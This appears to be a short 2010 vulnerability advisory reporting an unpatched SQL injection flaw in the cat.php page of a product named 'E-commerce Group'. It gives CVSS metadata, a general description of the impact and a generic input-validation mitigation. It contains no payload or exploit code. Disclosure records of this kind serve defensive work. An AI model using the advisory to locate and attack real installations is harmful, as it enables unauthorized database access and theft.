Vendor: E-commerce Group
By: BLack Revenge
CVSS: 7.5 (HIGH)
SQL Injection
CWE: 89
Product Name: E-commerce Group
Affected Version From: N/A
Affected Version To: N/A
Patch Exists: NO
Related CWE: N/A
CPE: N/A
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
2010
E-commerce Group (cat.php) SQL Injection Vulnerability
A vulnerability has been discovered in E-commerce Group (cat.php) that allows an attacker to inject malicious SQL commands into the application. User input is not properly sanitized before it is used in an SQL query, so an attacker can manipulate the query by injecting arbitrary SQL code. Exploitation can give access to sensitive information in the database, allow data to be modified, or allow system commands to be executed.
Mitigation:
Input validation should be used to ensure that untrusted data is not used to construct SQL queries in a way that would allow an attacker to modify the logic of the executed query.